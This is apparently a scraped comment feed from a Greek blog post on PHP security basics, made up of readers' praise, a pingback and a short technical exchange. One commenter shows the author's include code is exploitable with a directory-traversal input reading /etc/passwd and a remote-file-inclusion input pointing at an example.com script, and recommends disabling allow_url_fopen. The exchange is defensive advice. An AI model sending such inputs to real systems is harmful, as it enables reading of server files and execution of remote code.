Comments on: Securing PhP, τα βασικά http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/ Tue, 27 Dec 2011 22:15:00 +0000 hourly 1 http://wordpress.org/?v=3.3.1 By: Securing PhP, μέρος 2 » HumanWorks - SEO and Web development http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-392 Securing PhP, μέρος 2 » HumanWorks - SEO and Web development Tue, 07 Jul 2009 06:25:49 +0000 http://humanworks.gr/?p=140#comment-392 [...] με PhP, και έτσι είπα να επανέλθω με ακόμα ένα άρθρο για php security. Ως γνωστόν η ασφάλεια είναι ένα απο τα σημαντικότερα [...] [...] με PhP, και έτσι είπα να επανέλθω με ακόμα ένα άρθρο για php security. Ως γνωστόν η ασφάλεια είναι ένα απο τα σημαντικότερα [...]

]]> By: ale3andro http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-79 ale3andro Wed, 26 Nov 2008 21:02:51 +0000 http://humanworks.gr/?p=140#comment-79 Πολύ χρήσιμο άρθρο... Μπήκες και στοn δικό μου reader Πολύ χρήσιμο άρθρο… Μπήκες και στοn δικό μου reader

]]> By: Νίκος Παπανώτας http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-74 Νίκος Παπανώτας Mon, 24 Nov 2008 19:54:00 +0000 http://humanworks.gr/?p=140#comment-74 @Tsevdos thanks, αλλα μήν νομίζεις οτι είμαι κανένας guru. Απλά μετά απο τις αμέτρητες επιθέσεις έμαθα και δύο πραγματάκια.... @axel, πολύ σωστός. Αυτό δέν σκέφτηκα να το γράψω γιατι σε όλα τα site έχω safe mode, οπότε δέν γίνεται κάποιος να παίξει σε directory έξω απο το site. ΥΓ2: Είμαστε σειρά; Σου στέλνω email @Tsevdos thanks, αλλα μήν νομίζεις οτι είμαι κανένας guru. Απλά μετά απο τις αμέτρητες επιθέσεις έμαθα και δύο πραγματάκια….

@axel, πολύ σωστός. Αυτό δέν σκέφτηκα να το γράψω γιατι σε όλα τα site έχω safe mode, οπότε δέν γίνεται κάποιος να παίξει σε directory έξω απο το site.
ΥΓ2: Είμαστε σειρά; Σου στέλνω email

]]> By: axel http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-72 axel Mon, 24 Nov 2008 15:56:49 +0000 http://humanworks.gr/?p=140#comment-72 Hey Νίκο. Ένα σχόλιο σχετικά με τα File System Attacks που αναφέρεις. Ακόμα και με τον κώδικα που αναφέρεις δεν είσαι ασφαλής. 1ον. Είσαι ανοιχτός σε directory traversals. Η διαδρομή που θα μπορούσε κάποιος να ζητήσει στο include σου θα είναι action=../../etc/passwd Τη συνέχεια την καταλαβαίνεις. 2ον. Καλύτερα κάνε disable την allow_url_fopen. Διαφορετικά ο κακός της υπόθεσης μπορεί να χρησιμοποιήσει κάτι σαν action=http://www.example.com/hack_nikos.txt? ΥΓ: Στείλε μου email. ΥΓ2: 301-Δ07 ;) Hey Νίκο.

Ένα σχόλιο σχετικά με τα File System Attacks που αναφέρεις. Ακόμα και με τον κώδικα που αναφέρεις δεν είσαι ασφαλής.

1ον. Είσαι ανοιχτός σε directory traversals. Η διαδρομή που θα μπορούσε κάποιος να ζητήσει στο include σου θα είναι action=../../etc/passwd Τη συνέχεια την καταλαβαίνεις.
2ον. Καλύτερα κάνε disable την allow_url_fopen. Διαφορετικά ο κακός της υπόθεσης μπορεί να χρησιμοποιήσει κάτι σαν action=http://www.example.com/hack_nikos.txt?

ΥΓ: Στείλε μου email.
ΥΓ2: 301-Δ07 ;)

]]> By: John Tsevdos http://humanworks.gr/php/securing-php-%cf%84%ce%b1-%ce%b2%ce%b1%cf%83%ce%b9%ce%ba%ce%ac/comment-page-1/#comment-71 John Tsevdos Mon, 24 Nov 2008 15:46:22 +0000 http://humanworks.gr/?p=140#comment-71 Πολύ δυνατό άρθρο αγαπητέ, συγχαρητήρια. Είσαι ήδη στον RSS feed μου ;-) Πολύ δυνατό άρθρο αγαπητέ, συγχαρητήρια. Είσαι ήδη στον RSS feed μου ;-)

]]>